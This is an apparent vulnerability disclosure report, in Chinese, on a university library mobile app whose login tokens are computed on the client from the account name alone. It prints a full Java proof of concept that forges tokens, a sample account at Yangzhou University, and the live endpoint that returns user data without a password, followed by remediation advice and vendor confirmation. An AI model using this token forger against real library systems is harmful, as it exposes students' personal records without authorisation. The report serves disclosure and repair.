2014-12-01: 细节已通知厂商并且等待厂商处理中 2014-12-02: 厂商已经确认,细节仅向厂商公开 2014-12-05: 细节向第三方安全合作伙伴开放 2015-01-26: 细节向核心白帽子及相关领域专家公开 2015-02-05: 细节向普通白帽子公开 2015-02-15: 细节向实习白帽子公开 2015-03-01: 细节向公众公开
生成认证token,只用用户名即可获取用户信息
将用于认证的 token 的生成方式在客户端实现，且生成方式与密码无关——只要知道用户名就能在本地算出服务器接受的 token。受影响院校列表：http://www.libsys.com.cn/huiwen_app_center_2.php
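import java.io.UnsupportedEncodingException;
import java.math.BigInteger;

/**
 * Proof-of-concept re-implementation of the client-side token generator used by
 * the library mobile OPAC app covered by this report.
 *
 * The token is a pure function of the identity string passed in (the report uses
 * "&lt;account&gt;,&lt;school&gt;") plus a handful of client-chosen random digits.
 * No password and no server-held secret enter the computation, so anyone who knows
 * a user's account string can mint a token the server accepts. The only real fix is
 * to issue tokens on the server, bound to a credential check; nothing in this class
 * should be reused as an authentication mechanism.
 *
 * Pipeline of {@link #makeToken(String)}:
 * <ol>
 *   <li>UTF-8 encode the input and render it as upper-case hex.</li>
 *   <li>Insert one random decimal digit after hex positions 2, 4, 6, 8 and 10.</li>
 *   <li>Read the resulting string as a base-16 number ({@link #b(String)}).</li>
 *   <li>Pick an output base from the decimal digit sum (11..35, never 16;
 *       falls back to 18).</li>
 *   <li>Emit the number in that base ({@link #a(String, int)}) followed by the
 *       base indicator letter ({@link #a(long)}).</li>
 * </ol>
 *
 * The one-letter method names come from the decompiled (obfuscated) app and are
 * kept so the listing stays comparable with it.
 *
 * Created by snail on 14-11-23.
 */
public class LibToken {

    /**
     * Builds a token for the given identity string.
     *
     * @param s identity string, e.g. "1114011xx,扬州大学" (account, school name)
     * @return the token; {@code null} only if the JVM cannot encode UTF-8, which a
     *         conforming JVM never reports
     */
    public static String makeToken(String s) {
        byte[] raw;
        try {
            raw = s.getBytes("utf-8");
        } catch (UnsupportedEncodingException e) {
            return null;
        }

        // Step 1: upper-case hex of the UTF-8 bytes, exactly two chars per byte.
        StringBuilder hex = new StringBuilder(raw.length * 2);
        for (byte value : raw) {
            String pair = Integer.toHexString(0xff & value);
            if (pair.length() == 1) {
                hex.append('0');
            }
            hex.append(pair);
        }
        String upperHex = hex.toString().toUpperCase();

        // Step 2: inject a random decimal digit after positions 2, 4, 6, 8 and 10.
        // Math.random() is not a CSPRNG, but that is irrelevant here: the digits are
        // visible inside the token and add no secret, so they give no protection.
        StringBuilder salted = new StringBuilder(upperHex.length() + 5);
        for (int i = 0; i < upperHex.length(); i++) {
            salted.append(upperHex.charAt(i));
            if (i != 0 && i % 2 == 0 && i < 12) {
                salted.append((int) (10D * Math.random()));
            }
        }

        // Step 3: the salted string read as base 16, rendered in decimal.
        String decimal = b(salted.toString());

        // Step 4: the decimal digit sum selects the output base.
        int digitSum = 0;
        for (int i = 0; i < decimal.length(); i++) {
            digitSum += Integer.parseInt(String.valueOf(decimal.charAt(i)));
        }
        int base = digitSum % 36;
        if (base <= 10 || base == 16) {
            base = 18;
        }

        // Step 5: base-k digits followed by the single-letter base indicator.
        return a(decimal, base) + a(base);
    }

    /**
     * Converts a non-negative decimal integer string to base {@code k} using the
     * digit alphabet 0-9, A-Z.
     *
     * Zero yields "" (the original emitted no digit for it; preserved). For bases
     * above 36, digit values without a symbol are dropped by {@link #a(long)},
     * also preserved. The original collected digits in a fixed 500-slot array and
     * threw ArrayIndexOutOfBoundsException for longer results; this version grows
     * with the input. A negative value used to loop forever and now fails fast.
     *
     * @param s non-negative integer in decimal
     * @param k target base, at least 2
     * @return digits of {@code s} in base {@code k}, most significant first
     * @throws NumberFormatException if {@code s} is not a decimal integer
     * @throws IllegalArgumentException if {@code s} is negative or {@code k} < 2
     */
    public static String a(String s, int k) {
        BigInteger value = new BigInteger(s);
        if (value.signum() < 0) {
            throw new IllegalArgumentException("negative value: " + s);
        }
        if (k < 2) {
            throw new IllegalArgumentException("base must be >= 2: " + k);
        }
        BigInteger radix = BigInteger.valueOf(k);

        // Digits come out least-significant first; collect then reverse. Every
        // symbol a(long) returns is a single char (or empty), so a char reverse
        // is safe.
        StringBuilder digits = new StringBuilder();
        while (value.signum() != 0) {
            BigInteger remainder = value.mod(radix);
            digits.append(a(remainder.longValue()));
            value = value.subtract(remainder).divide(radix);
        }
        return digits.reverse().toString();
    }

    /**
     * Maps a digit value to its symbol: 0-9 as themselves, 10-35 as A-Z.
     * Values of 36 and above have no symbol and yield "" (preserved from the
     * original, which silently drops them); negative values are rendered as the
     * plain decimal string, e.g. "-3".
     *
     * @param l digit value
     * @return the one-character symbol, or "" when there is none
     */
    public static String a(long l) {
        if (l < 10L) {
            return String.valueOf(l);
        }
        if (l < 36L) {
            return String.valueOf((char) ('A' + (l - 10L)));
        }
        return "";
    }

    /**
     * Parses {@code s} as a base-16 number with the alphabet 0-9, A-Z and returns it
     * in decimal (Horner evaluation, same sum as the original's per-position pow).
     *
     * The alphabet is deliberately wider than hex to match the app: 'G'..'Z' map to
     * 16..35 and any other character, including lower-case hex, maps to -1. The
     * result is therefore only a true hex value for upper-case hex input, which is
     * what {@link #makeToken(String)} feeds it; other input silently yields garbage.
     *
     * @param s string of 0-9 / A-Z digits
     * @return decimal representation of the parsed value; "0" for an empty string
     */
    public static String b(String s) {
        BigInteger sixteen = BigInteger.valueOf(16);
        BigInteger acc = BigInteger.ZERO;
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            int digit;
            if (c >= '0' && c <= '9') {
                digit = c - '0';
            } else if (c >= 'A' && c <= 'Z') {
                digit = 10 + (c - 'A');
            } else {
                digit = -1;
            }
            acc = acc.multiply(sixteen).add(BigInteger.valueOf(digit));
        }
        return acc.toString();
    }

    /** Demo: prints a token for the account/school pair used in the report. */
    public static void main(String[] args) {
        System.out.println("token--->" + LibToken.makeToken("1114011xx,扬州大学"));
    }
}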
将生成的 token 填入 http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx 即可取得对应用户的信息，全程不需要密码。
token 应在服务器端、经过密码校验后签发（并设置有效期），而不是由客户端自行计算；若短期内无法改造，至少应使 token 的生成依赖密码或服务器端密钥，使得仅凭用户名无法算出 token。
危害等级:中
漏洞Rank:9
确认时间:2014-12-02 10:08
谢谢,我们会尽快修复漏洞
暂无